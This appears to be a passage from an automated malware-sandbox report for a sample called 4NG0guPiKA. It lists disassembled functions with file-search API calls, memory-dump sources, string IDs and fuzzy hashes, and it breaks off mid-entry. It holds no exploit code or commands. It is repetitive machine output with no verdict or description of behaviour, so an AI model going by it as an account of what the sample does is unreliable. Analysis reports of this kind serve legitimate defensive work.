                                                                                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,774D2EE0,00434000), ref: 0040580C
                                                                                                            • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,774D2EE0,00434000), ref: 0040581C
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 2035342205-1173974218
                                                                                                            • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                            • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                            • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                            • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                            Function 35F2AFF8 Relevance: 13.0, Strings: 10, Instructions: 461COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$H'3d'3$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-1641965047
                                                                                                            • Opcode ID: b7be39549f0ddb1ce639471888cab3c82342a848d51dec27d35fe28ec60a8ad4
                                                                                                            • Instruction ID: 3600e76db007edba7ca896d0f8ca7b1ea4e135652ca573b149baf9baf3a4507a
                                                                                                            • Opcode Fuzzy Hash: b7be39549f0ddb1ce639471888cab3c82342a848d51dec27d35fe28ec60a8ad4
                                                                                                            • Instruction Fuzzy Hash: 393280B4E012188FEB64CF65C994B9DBBB2BF89300F1085A9D809BB351DB759E85CF14
                                                                                                            Function 35F2AFE8 Relevance: 12.9, Strings: 10, Instructions: 371COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$H'3d'3$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-1641965047
                                                                                                            • Opcode ID: f260281012b1fc5b6c037f22872bc2aad7c7027320ada2f112bc23254c773822
                                                                                                            • Instruction ID: eed1f64f304a22d3a3f812b32bb79a6cf333a2aea7cc2e8de2553656342387e4
                                                                                                            • Opcode Fuzzy Hash: f260281012b1fc5b6c037f22872bc2aad7c7027320ada2f112bc23254c773822
                                                                                                            • Instruction Fuzzy Hash: 680290B4E002188FEB54CF69C994BDDBBB2BF89300F1081A9D809A7361DB759E85CF15
                                                                                                            Function 35F2AFF7 Relevance: 12.9, Strings: 10, Instructions: 361COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$H'3d'3$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-1641965047
                                                                                                            • Opcode ID: 5254f5be63372326d61be829fade75706b452dc41564403867575004591b56a3
                                                                                                            • Instruction ID: e233a6ca7b2c233696c821cab8ed4634af6774f5b833d89137d43b3422fb93e3
                                                                                                            • Opcode Fuzzy Hash: 5254f5be63372326d61be829fade75706b452dc41564403867575004591b56a3
                                                                                                            • Instruction Fuzzy Hash: 4E0280B4E002188FEB54CF65C994BDDBBB2BF89300F1081A9D809A7365DB759E85CF15
                                                                                                            Function 0040653F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                            • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                            Function 0040622D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,774D2EE0,00405792,?,00436800,774D2EE0), ref: 00406238
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: WB
                                                                                                            • API String ID: 2295610775-2854515933
                                                                                                            • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                            • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                            Function 35F24820 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: H'3d'3
                                                                                                            • API String ID: 0-2180681280
                                                                                                            • Opcode ID: ee3d461bfb353bd9b4c63d0ed2174d6b0f71496c49f8904a298c5b812000de21
                                                                                                            • Instruction ID: e653e6508f905cb86ccc27f051c29f5b3812f511c3ed9224bf00ad1c7e91b56f
                                                                                                            • Opcode Fuzzy Hash: ee3d461bfb353bd9b4c63d0ed2174d6b0f71496c49f8904a298c5b812000de21
                                                                                                            • Instruction Fuzzy Hash: D5C1AD78E00358CFEB14DFA9C984B9DBBB2BB89300F1081A9D409BB355DB759A81CF54
                                                                                                            Function 35F27B4F Relevance: .6, Instructions: 607COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d87f4dfdc9ce8be73c605553f5c85a73a7b3b015a4a08c4f4d284aa1b29ebe82
                                                                                                            • Instruction ID: 07cc59ba1542da4a6e100e3c44ebf410ab5f389fdfbee54747e5845487027d67
                                                                                                            • Opcode Fuzzy Hash: d87f4dfdc9ce8be73c605553f5c85a73a7b3b015a4a08c4f4d284aa1b29ebe82
                                                                                                            • Instruction Fuzzy Hash: C3627A74E012688FDB64DF69C884BDDBBB2BB89301F1085EAD409AB355DB359E81CF50
                                                                                                            Function 331EBD88 Relevance: .3, Instructions: 275COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fba67b9a7a319ab0cd21f8064e0203159153377a6cd42d0de600a6869172428e
                                                                                                            • Instruction ID: 3ac376d039040cb46d1f373e17398a8d6860723f32dd1b10cf9acfde5416b6ad
                                                                                                            • Opcode Fuzzy Hash: fba67b9a7a319ab0cd21f8064e0203159153377a6cd42d0de600a6869172428e
                                                                                                            • Instruction Fuzzy Hash: 6CC1AE74E00358CFEB14DFA9C994B9DBBB2AB89300F2081A9D409BB355DB359A85CF54
                                                                                                            Function 331EF042 Relevance: .3, Instructions: 274COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c1d6b8bc0e941758b9db29a1801648a59feb37ec086477cba2f2a2f922d023f
                                                                                                            • Instruction ID: e6924ed3e96bfd91f5b8093ffc0eccf5817cbb153b1a46c47e9f186d84abcda8
                                                                                                            • Opcode Fuzzy Hash: 0c1d6b8bc0e941758b9db29a1801648a59feb37ec086477cba2f2a2f922d023f
                                                                                                            • Instruction Fuzzy Hash: 83C1A074E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D809BB355DB359A85CF54
                                                                                                            Function 331EB07F Relevance: .3, Instructions: 274COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 491185a1f3f329195e65077e675afbe56f554cd7f0c7591006fbb5a7bb70aae4
                                                                                                            • Instruction ID: a7e4cbad145a63de6844c8bf782b9c11e1d85f480274e35df8d410c59babf7d6
                                                                                                            • Opcode Fuzzy Hash: 491185a1f3f329195e65077e675afbe56f554cd7f0c7591006fbb5a7bb70aae4
                                                                                                            • Instruction Fuzzy Hash: 32C1BD74E01218CFEB14DFA9C994B9DBBB2BF89300F2081A9D409BB355DB359A85CF54
                                                                                                            Function 331EE790 Relevance: .3, Instructions: 272COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e6daab3c9f829b2e8eb7eaf0b22d26245a574dc11a4f18f59b5659eb73175af3
                                                                                                            • Instruction ID: 9fd19d0e8f311c0288e685227adcf2f62aa7d60d9bcdbb180f05c4cb92e00da8
                                                                                                            • Opcode Fuzzy Hash: e6daab3c9f829b2e8eb7eaf0b22d26245a574dc11a4f18f59b5659eb73175af3
                                                                                                            • Instruction Fuzzy Hash: 1EC1AE74E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB365DB359A85CF54
                                                                                                            Function 331EDEE1 Relevance: .3, Instructions: 272COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9ec407e03ce692f438b2909a3381e008e315f8e9195d0a443aa22e5ba90eabc3
                                                                                                            • Instruction ID: 3ba28145effb127195c7fdd3763d23bfe787f4298016f59ca0403967a3b02416
                                                                                                            • Opcode Fuzzy Hash: 9ec407e03ce692f438b2909a3381e008e315f8e9195d0a443aa22e5ba90eabc3
                                                                                                            • Instruction Fuzzy Hash: 68C1A074E00358CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359A85CF54
                                                                                                            Function 331EE339 Relevance: .3, Instructions: 271COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f85badff1301c238b363dfe64a7ba050ffa71dc952eaee265a7a60b55fad61e
                                                                                                            • Instruction ID: ee2d15aab83d0a5b5c840c059432ec0fe4c5b5d0cfc6641a310404f7ef824a0a
                                                                                                            • Opcode Fuzzy Hash: 8f85badff1301c238b363dfe64a7ba050ffa71dc952eaee265a7a60b55fad61e
                                                                                                            • Instruction Fuzzy Hash: 4AC19F74E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB365DB359A85CF54
                                                                                                            Function 331EDA89 Relevance: .3, Instructions: 271COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8b33a3b1380dacb5d349396bcfa461f7c9ab56c54dacb30950a13c5439e0d73
                                                                                                            • Instruction ID: 8183be1b14a02764a635b2e3f3456350df56b00a21d6a6422938b5064e70ecbc
                                                                                                            • Opcode Fuzzy Hash: b8b33a3b1380dacb5d349396bcfa461f7c9ab56c54dacb30950a13c5439e0d73
                                                                                                            • Instruction Fuzzy Hash: 28C1AE74E00358CFEB14DFA9C994B9DBBB2AF89300F2081A9D409BB355DB759A85CF14
                                                                                                            Function 331EEBF7 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ff0b290b69588aa91a5297119221b4dc9f7c924fc2b427e86b109b826e5c4e6c
                                                                                                            • Instruction ID: d69aadb7f33c59f77d8735ce9d8a0ee8d6561d0bbeab26cb47600bc9ea1e6f40
                                                                                                            • Opcode Fuzzy Hash: ff0b290b69588aa91a5297119221b4dc9f7c924fc2b427e86b109b826e5c4e6c
                                                                                                            • Instruction Fuzzy Hash: DCC1A074E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D409BB365DB359A85CF54
                                                                                                            Function 35F24DB0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 39a0d650368f56e52ac8d5445a42404923627b15e2f8d3cd7039ec0043f55144
                                                                                                            • Instruction ID: 580b4a34a49cfe93cb512a394678072b8d6b774c2657e62507f1a8be6ce1c3d3
                                                                                                            • Opcode Fuzzy Hash: 39a0d650368f56e52ac8d5445a42404923627b15e2f8d3cd7039ec0043f55144
                                                                                                            • Instruction Fuzzy Hash: B0C1BF74E00218CFEB14DFA9C994B9DBBB2BF89300F1081A9D409BB355DB759A85CF54
                                                                                                            Function 35F22560 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce8c79308ab802315b699d16d83a5d12f0022a15d7937866ba03609e62c22b69
                                                                                                            • Instruction ID: 03538fc65724ee77b3f2dabd11796bd1f4c66a556ece6bc63366119aca61fd09
                                                                                                            • Opcode Fuzzy Hash: ce8c79308ab802315b699d16d83a5d12f0022a15d7937866ba03609e62c22b69
                                                                                                            • Instruction Fuzzy Hash: E6C1BE78E00318CFEB14DFA9C994B9DBBB2BB89300F5081A9D409BB355DB359A85CF14
                                                                                                            Function 35F274C8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 41d89cda99d5cf8ea0fde2594fa2402dd6c4d0835c27d7e42b524f449f20ca5c
                                                                                                            • Instruction ID: ce4df075cdb98341ffe66360f05acfabaefa9f1d556c0aa42ef552595b021922
                                                                                                            • Opcode Fuzzy Hash: 41d89cda99d5cf8ea0fde2594fa2402dd6c4d0835c27d7e42b524f449f20ca5c
                                                                                                            • Instruction Fuzzy Hash: 2AC1B074E01358CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB359A81CF14
                                                                                                            Function 35F21CB0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aa7915f670f3045518761125107310aab453b0ae3d68e484cc67851df55bad7e
                                                                                                            • Instruction ID: 7a8563cafece0856eeee2965d40eadfad0378a1c4fed0bdd38237ed964646a5a
                                                                                                            • Opcode Fuzzy Hash: aa7915f670f3045518761125107310aab453b0ae3d68e484cc67851df55bad7e
                                                                                                            • Instruction Fuzzy Hash: 8CC1AF78E00358CFDB14DFA9C994B9DBBB2AF89300F1081A9D809BB355DB759A81CF54
                                                                                                            Function 35F26C18 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 80033e7f6049baabf88621df4ab0eb4eac9f4e6db5459a31f4ddc65ca71a9cad
                                                                                                            • Instruction ID: 36e4f7d2ca36825eae047c02778dd585a690d48131650ad29f047972ebb5f8e5
                                                                                                            • Opcode Fuzzy Hash: 80033e7f6049baabf88621df4ab0eb4eac9f4e6db5459a31f4ddc65ca71a9cad
                                                                                                            • Instruction Fuzzy Hash: A3C1BE78E00358CFEB14DFA9C994B9DBBB2AB89300F1081A9D409BB355DB359A85CF54
                                                                                                            Function 35F21400 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb61db1cdebf126a87ab810188d1cd62eeffa860c8ae7993de90a9aa8caa3828
                                                                                                            • Instruction ID: ddfe90491b4fcbf91abce78634d782ffeda4385732c36300f9b1619aad907ad4
                                                                                                            • Opcode Fuzzy Hash: eb61db1cdebf126a87ab810188d1cd62eeffa860c8ae7993de90a9aa8caa3828
                                                                                                            • Instruction Fuzzy Hash: 97C1AF78E00358CFDB14DFA9C994B9DBBB2BB89300F2081A9D409BB355DB359A81CF54
                                                                                                            Function 35F267C0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cdaf339ec6205a8e656c1fabbe9eb0841807a4e5f868868e1241e6bef222fbc6
                                                                                                            • Instruction ID: feed5c45db3668b7e359ce48bfabce30817860d5dad2dc142d6b974e82821b20
                                                                                                            • Opcode Fuzzy Hash: cdaf339ec6205a8e656c1fabbe9eb0841807a4e5f868868e1241e6bef222fbc6
                                                                                                            • Instruction Fuzzy Hash: E3C1AE78E00218CFDB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB359A85CF54
                                                                                                            Function 35F20FA8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c2cd1d1b1eb4934239bf9ac1f0c5efae736ab4e1894e38a49b3bcceb5f69b2c6
                                                                                                            • Instruction ID: 3c6f8539e8b240f6b09c268794d9db46dfcbd3b586f23b1ac561f27dad151694
                                                                                                            • Opcode Fuzzy Hash: c2cd1d1b1eb4934239bf9ac1f0c5efae736ab4e1894e38a49b3bcceb5f69b2c6
                                                                                                            • Instruction Fuzzy Hash: 74C1AE78E00358CFEB14DFA9C994B9DBBB2AB89300F1081A9D409BB355DB359A81CF14
                                                                                                            Function 35F23F70 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f4bdf300de0f01ef92e07ae5bff5aa3da1fb60612aca6664a0f2dc663ab6329
                                                                                                            • Instruction ID: 0b6d10d0c47f6e2bd8f2151c1ab6bce51b6581ea27a8c1c8b4ad2adc24e98145
                                                                                                            • Opcode Fuzzy Hash: 4f4bdf300de0f01ef92e07ae5bff5aa3da1fb60612aca6664a0f2dc663ab6329
                                                                                                            • Instruction Fuzzy Hash: 78C1AE78E00318CFEB14DFA9C994B9DBBB2BB89300F1081A9D409BB355DB759A85CF54
                                                                                                            Function 35F25F10 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 651983635736e6b2c13e3d62fcc80bbdd74969bf0cf6d04c44dff3ae571a32e8
                                                                                                            • Instruction ID: ba404e2b93285434a7c9557391b3d4152502bb2b59bc6e8b9acd2fdee2a037ff
